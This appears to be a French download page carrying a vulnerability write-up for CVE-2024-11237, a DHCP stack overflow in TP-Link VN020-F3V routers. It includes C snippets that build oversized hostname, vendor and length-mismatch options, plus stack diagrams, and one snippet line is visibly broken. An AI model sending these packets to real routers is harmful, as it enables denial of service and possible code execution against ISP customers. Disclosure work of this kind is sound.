TP Thumper Téléchargement - TP Thumper Source Téléchargement

TP Thumper

Autre code source

Télécharger

TP-Link VN020 Corruption de la mémoire DHCP (CVE-2024-11237)

Vulnérabilité critique dans le traitement des paquets DHCP

Aperçu

Une vulnérabilité critique a été découverte dans les routeurs TP-Link VN020 F3V (T) exécutant la version du firmware TT_V6.2.1021. La vulnérabilité permet aux attaquants distants de déclencher un débordement de tampon basé sur la pile dans des paquets DHCP spécialement conçus, conduisant à des conditions de déni de service (DOS).

Dispositifs affectés:

Modèle de routeur: TP-Link VN020-F3V (T)
Version du firmware: TT_V6.2.1021
Déploiement: principalement via Tunisie Telecom et TopNet FAI
Variantes confirmées: affecte également les versions algériennes et marocaines

Remarque importante: En raison de la nature propriétaire du firmware, les détails exacts de l'implémentation interne sont inconnus. Cette analyse est basée sur le comportement observé et les tests de boîte noire.

Détails de vulnérabilité

CVE ID : CVE-2024-11237
Type : débordement de tampon basé sur la pile (CWE-121)
Vector d'attaque : distant (paquet DHCP Discover)
Authentification : aucune requise
Port : UDP / 67 (serveur DHCP)
Impact : DOS (confirmé) & RCE (possible)
Complexité : faible

Analyse technique

Structure de paquets DHCP

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

Vecteurs d'exploitation

Traitement du nom d'hôte DHCP

 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );

Option spécifique au fournisseur

 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );

Manipulation du champ de longueur

 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

Corruption potentielle de la mémoire

Bien que l'implémentation interne soit inconnue, le comportement observé suggère des problèmes potentiels de corruption de la mémoire:

Traitement du nom d'hôte DHCP normal

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

Qu'est-ce qui pourrait potentiellement se produire à l'intérieur du routeur?

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

Ceci est théorique, et certains détails peuvent ne pas être entièrement exacts, car TP-Link fournit le micrologiciel pour ce routeur exclusivement aux FAI.